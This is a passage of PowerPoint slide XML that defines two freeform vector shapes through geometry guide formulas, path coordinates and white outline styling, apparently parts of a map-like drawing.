            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36136" name="Freeform 269"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2874" y="2188"/>
                <a:ext cx="15" cy="35"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 15"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 14 w 15"/>
                  <a:gd name="T3" fmla="*/ 2 h 35"/>
                  <a:gd name="T4" fmla="*/ 15 w 15"/>
                  <a:gd name="T5" fmla="*/ 4 h 35"/>
                  <a:gd name="T6" fmla="*/ 14 w 15"/>
                  <a:gd name="T7" fmla="*/ 9 h 35"/>
                  <a:gd name="T8" fmla="*/ 15 w 15"/>
                  <a:gd name="T9" fmla="*/ 9 h 35"/>
                  <a:gd name="T10" fmla="*/ 15 w 15"/>
                  <a:gd name="T11" fmla="*/ 13 h 35"/>
                  <a:gd name="T12" fmla="*/ 15 w 15"/>
                  <a:gd name="T13" fmla="*/ 20 h 35"/>
                  <a:gd name="T14" fmla="*/ 13 w 15"/>
                  <a:gd name="T15" fmla="*/ 23 h 35"/>
                  <a:gd name="T16" fmla="*/ 13 w 15"/>
                  <a:gd name="T17" fmla="*/ 30 h 35"/>
                  <a:gd name="T18" fmla="*/ 10 w 15"/>
                  <a:gd name="T19" fmla="*/ 35 h 35"/>
                  <a:gd name="T20" fmla="*/ 8 w 15"/>
                  <a:gd name="T21" fmla="*/ 35 h 35"/>
                  <a:gd name="T22" fmla="*/ 8 w 15"/>
                  <a:gd name="T23" fmla="*/ 33 h 35"/>
                  <a:gd name="T24" fmla="*/ 5 w 15"/>
                  <a:gd name="T25" fmla="*/ 32 h 35"/>
                  <a:gd name="T26" fmla="*/ 3 w 15"/>
                  <a:gd name="T27" fmla="*/ 31 h 35"/>
                  <a:gd name="T28" fmla="*/ 5 w 15"/>
                  <a:gd name="T29" fmla="*/ 29 h 35"/>
                  <a:gd name="T30" fmla="*/ 5 w 15"/>
                  <a:gd name="T31" fmla="*/ 28 h 35"/>
                  <a:gd name="T32" fmla="*/ 2 w 15"/>
                  <a:gd name="T33" fmla="*/ 27 h 35"/>
                  <a:gd name="T34" fmla="*/ 4 w 15"/>
                  <a:gd name="T35" fmla="*/ 24 h 35"/>
                  <a:gd name="T36" fmla="*/ 3 w 15"/>
                  <a:gd name="T37" fmla="*/ 23 h 35"/>
                  <a:gd name="T38" fmla="*/ 1 w 15"/>
                  <a:gd name="T39" fmla="*/ 24 h 35"/>
                  <a:gd name="T40" fmla="*/ 0 w 15"/>
                  <a:gd name="T41" fmla="*/ 22 h 35"/>
                  <a:gd name="T42" fmla="*/ 1 w 15"/>
                  <a:gd name="T43" fmla="*/ 22 h 35"/>
                  <a:gd name="T44" fmla="*/ 2 w 15"/>
                  <a:gd name="T45" fmla="*/ 21 h 35"/>
                  <a:gd name="T46" fmla="*/ 2 w 15"/>
                  <a:gd name="T47" fmla="*/ 19 h 35"/>
                  <a:gd name="T48" fmla="*/ 0 w 15"/>
                  <a:gd name="T49" fmla="*/ 18 h 35"/>
                  <a:gd name="T50" fmla="*/ 0 w 15"/>
                  <a:gd name="T51" fmla="*/ 17 h 35"/>
                  <a:gd name="T52" fmla="*/ 2 w 15"/>
                  <a:gd name="T53" fmla="*/ 16 h 35"/>
                  <a:gd name="T54" fmla="*/ 0 w 15"/>
                  <a:gd name="T55" fmla="*/ 14 h 35"/>
                  <a:gd name="T56" fmla="*/ 2 w 15"/>
                  <a:gd name="T57" fmla="*/ 11 h 35"/>
                  <a:gd name="T58" fmla="*/ 6 w 15"/>
                  <a:gd name="T59" fmla="*/ 8 h 35"/>
                  <a:gd name="T60" fmla="*/ 8 w 15"/>
                  <a:gd name="T61" fmla="*/ 8 h 35"/>
                  <a:gd name="T62" fmla="*/ 8 w 15"/>
                  <a:gd name="T63" fmla="*/ 7 h 35"/>
                  <a:gd name="T64" fmla="*/ 10 w 15"/>
                  <a:gd name="T65" fmla="*/ 6 h 35"/>
                  <a:gd name="T66" fmla="*/ 12 w 15"/>
                  <a:gd name="T67" fmla="*/ 7 h 35"/>
                  <a:gd name="T68" fmla="*/ 12 w 15"/>
                  <a:gd name="T69" fmla="*/ 6 h 35"/>
                  <a:gd name="T70" fmla="*/ 12 w 15"/>
                  <a:gd name="T71" fmla="*/ 2 h 35"/>
                  <a:gd name="T72" fmla="*/ 13 w 15"/>
                  <a:gd name="T73" fmla="*/ 0 h 35"/>
                  <a:gd name="T74" fmla="*/ 14 w 15"/>
                  <a:gd name="T75" fmla="*/ 0 h 35"/>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5"/>
                  <a:gd name="T115" fmla="*/ 0 h 35"/>
                  <a:gd name="T116" fmla="*/ 15 w 15"/>
                  <a:gd name="T117" fmla="*/ 35 h 35"/>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5" h="35">
                    <a:moveTo>
                      <a:pt x="14" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36137" name="Freeform 270"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2663" y="1999"/>
                <a:ext cx="205" cy="204"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 55 w 205"/>
                  <a:gd name="T1" fmla="*/ 155 h 204"/>
                  <a:gd name="T2" fmla="*/ 56 w 205"/>
                  <a:gd name="T3" fmla="*/ 142 h 204"/>
                  <a:gd name="T4" fmla="*/ 63 w 205"/>
                  <a:gd name="T5" fmla="*/ 142 h 204"/>
                  <a:gd name="T6" fmla="*/ 56 w 205"/>
                  <a:gd name="T7" fmla="*/ 129 h 204"/>
                  <a:gd name="T8" fmla="*/ 56 w 205"/>
                  <a:gd name="T9" fmla="*/ 115 h 204"/>
                  <a:gd name="T10" fmla="*/ 42 w 205"/>
                  <a:gd name="T11" fmla="*/ 103 h 204"/>
                  <a:gd name="T12" fmla="*/ 36 w 205"/>
                  <a:gd name="T13" fmla="*/ 93 h 204"/>
                  <a:gd name="T14" fmla="*/ 31 w 205"/>
                  <a:gd name="T15" fmla="*/ 88 h 204"/>
                  <a:gd name="T16" fmla="*/ 15 w 205"/>
                  <a:gd name="T17" fmla="*/ 81 h 204"/>
                  <a:gd name="T18" fmla="*/ 4 w 205"/>
                  <a:gd name="T19" fmla="*/ 76 h 204"/>
                  <a:gd name="T20" fmla="*/ 7 w 205"/>
                  <a:gd name="T21" fmla="*/ 71 h 204"/>
                  <a:gd name="T22" fmla="*/ 5 w 205"/>
                  <a:gd name="T23" fmla="*/ 67 h 204"/>
                  <a:gd name="T24" fmla="*/ 3 w 205"/>
                  <a:gd name="T25" fmla="*/ 63 h 204"/>
                  <a:gd name="T26" fmla="*/ 14 w 205"/>
                  <a:gd name="T27" fmla="*/ 60 h 204"/>
                  <a:gd name="T28" fmla="*/ 21 w 205"/>
                  <a:gd name="T29" fmla="*/ 56 h 204"/>
                  <a:gd name="T30" fmla="*/ 34 w 205"/>
                  <a:gd name="T31" fmla="*/ 63 h 204"/>
                  <a:gd name="T32" fmla="*/ 46 w 205"/>
                  <a:gd name="T33" fmla="*/ 59 h 204"/>
                  <a:gd name="T34" fmla="*/ 51 w 205"/>
                  <a:gd name="T35" fmla="*/ 57 h 204"/>
                  <a:gd name="T36" fmla="*/ 50 w 205"/>
                  <a:gd name="T37" fmla="*/ 46 h 204"/>
                  <a:gd name="T38" fmla="*/ 56 w 205"/>
                  <a:gd name="T39" fmla="*/ 35 h 204"/>
                  <a:gd name="T40" fmla="*/ 69 w 205"/>
                  <a:gd name="T41" fmla="*/ 43 h 204"/>
                  <a:gd name="T42" fmla="*/ 81 w 205"/>
                  <a:gd name="T43" fmla="*/ 41 h 204"/>
                  <a:gd name="T44" fmla="*/ 85 w 205"/>
                  <a:gd name="T45" fmla="*/ 32 h 204"/>
                  <a:gd name="T46" fmla="*/ 101 w 205"/>
                  <a:gd name="T47" fmla="*/ 22 h 204"/>
                  <a:gd name="T48" fmla="*/ 108 w 205"/>
                  <a:gd name="T49" fmla="*/ 2 h 204"/>
                  <a:gd name="T50" fmla="*/ 120 w 205"/>
                  <a:gd name="T51" fmla="*/ 9 h 204"/>
                  <a:gd name="T52" fmla="*/ 127 w 205"/>
                  <a:gd name="T53" fmla="*/ 9 h 204"/>
                  <a:gd name="T54" fmla="*/ 134 w 205"/>
                  <a:gd name="T55" fmla="*/ 19 h 204"/>
                  <a:gd name="T56" fmla="*/ 142 w 205"/>
                  <a:gd name="T57" fmla="*/ 24 h 204"/>
                  <a:gd name="T58" fmla="*/ 147 w 205"/>
                  <a:gd name="T59" fmla="*/ 29 h 204"/>
                  <a:gd name="T60" fmla="*/ 152 w 205"/>
                  <a:gd name="T61" fmla="*/ 28 h 204"/>
                  <a:gd name="T62" fmla="*/ 159 w 205"/>
                  <a:gd name="T63" fmla="*/ 35 h 204"/>
                  <a:gd name="T64" fmla="*/ 168 w 205"/>
                  <a:gd name="T65" fmla="*/ 40 h 204"/>
                  <a:gd name="T66" fmla="*/ 181 w 205"/>
                  <a:gd name="T67" fmla="*/ 45 h 204"/>
                  <a:gd name="T68" fmla="*/ 192 w 205"/>
                  <a:gd name="T69" fmla="*/ 48 h 204"/>
                  <a:gd name="T70" fmla="*/ 198 w 205"/>
                  <a:gd name="T71" fmla="*/ 50 h 204"/>
                  <a:gd name="T72" fmla="*/ 198 w 205"/>
                  <a:gd name="T73" fmla="*/ 63 h 204"/>
                  <a:gd name="T74" fmla="*/ 196 w 205"/>
                  <a:gd name="T75" fmla="*/ 75 h 204"/>
                  <a:gd name="T76" fmla="*/ 189 w 205"/>
                  <a:gd name="T77" fmla="*/ 88 h 204"/>
                  <a:gd name="T78" fmla="*/ 185 w 205"/>
                  <a:gd name="T79" fmla="*/ 91 h 204"/>
                  <a:gd name="T80" fmla="*/ 181 w 205"/>
                  <a:gd name="T81" fmla="*/ 98 h 204"/>
                  <a:gd name="T82" fmla="*/ 172 w 205"/>
                  <a:gd name="T83" fmla="*/ 111 h 204"/>
                  <a:gd name="T84" fmla="*/ 173 w 205"/>
                  <a:gd name="T85" fmla="*/ 119 h 204"/>
                  <a:gd name="T86" fmla="*/ 186 w 205"/>
                  <a:gd name="T87" fmla="*/ 124 h 204"/>
                  <a:gd name="T88" fmla="*/ 189 w 205"/>
                  <a:gd name="T89" fmla="*/ 135 h 204"/>
                  <a:gd name="T90" fmla="*/ 179 w 205"/>
                  <a:gd name="T91" fmla="*/ 142 h 204"/>
                  <a:gd name="T92" fmla="*/ 186 w 205"/>
                  <a:gd name="T93" fmla="*/ 151 h 204"/>
                  <a:gd name="T94" fmla="*/ 196 w 205"/>
                  <a:gd name="T95" fmla="*/ 162 h 204"/>
                  <a:gd name="T96" fmla="*/ 192 w 205"/>
                  <a:gd name="T97" fmla="*/ 174 h 204"/>
                  <a:gd name="T98" fmla="*/ 174 w 205"/>
                  <a:gd name="T99" fmla="*/ 187 h 204"/>
                  <a:gd name="T100" fmla="*/ 156 w 205"/>
                  <a:gd name="T101" fmla="*/ 182 h 204"/>
                  <a:gd name="T102" fmla="*/ 146 w 205"/>
                  <a:gd name="T103" fmla="*/ 181 h 204"/>
                  <a:gd name="T104" fmla="*/ 129 w 205"/>
                  <a:gd name="T105" fmla="*/ 185 h 204"/>
                  <a:gd name="T106" fmla="*/ 125 w 205"/>
                  <a:gd name="T107" fmla="*/ 202 h 204"/>
                  <a:gd name="T108" fmla="*/ 114 w 205"/>
                  <a:gd name="T109" fmla="*/ 204 h 204"/>
                  <a:gd name="T110" fmla="*/ 106 w 205"/>
                  <a:gd name="T111" fmla="*/ 202 h 204"/>
                  <a:gd name="T112" fmla="*/ 98 w 205"/>
                  <a:gd name="T113" fmla="*/ 202 h 204"/>
                  <a:gd name="T114" fmla="*/ 85 w 205"/>
                  <a:gd name="T115" fmla="*/ 194 h 204"/>
                  <a:gd name="T116" fmla="*/ 79 w 205"/>
                  <a:gd name="T117" fmla="*/ 196 h 204"/>
                  <a:gd name="T118" fmla="*/ 69 w 205"/>
                  <a:gd name="T119" fmla="*/ 193 h 204"/>
                  <a:gd name="T120" fmla="*/ 63 w 205"/>
                  <a:gd name="T121" fmla="*/ 191 h 204"/>
                  <a:gd name="T122" fmla="*/ 52 w 205"/>
                  <a:gd name="T123" fmla="*/ 189 h 204"/>
                  <a:gd name="T124" fmla="*/ 49 w 205"/>
                  <a:gd name="T125" fmla="*/ 185 h 204"/>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205"/>
                  <a:gd name="T190" fmla="*/ 0 h 204"/>
                  <a:gd name="T191" fmla="*/ 205 w 205"/>
                  <a:gd name="T192" fmla="*/ 204 h 204"/>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205" h="204">
                    <a:moveTo>
                      <a:pt x="46" y="182"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="108"/>
                    </a:lnTo>
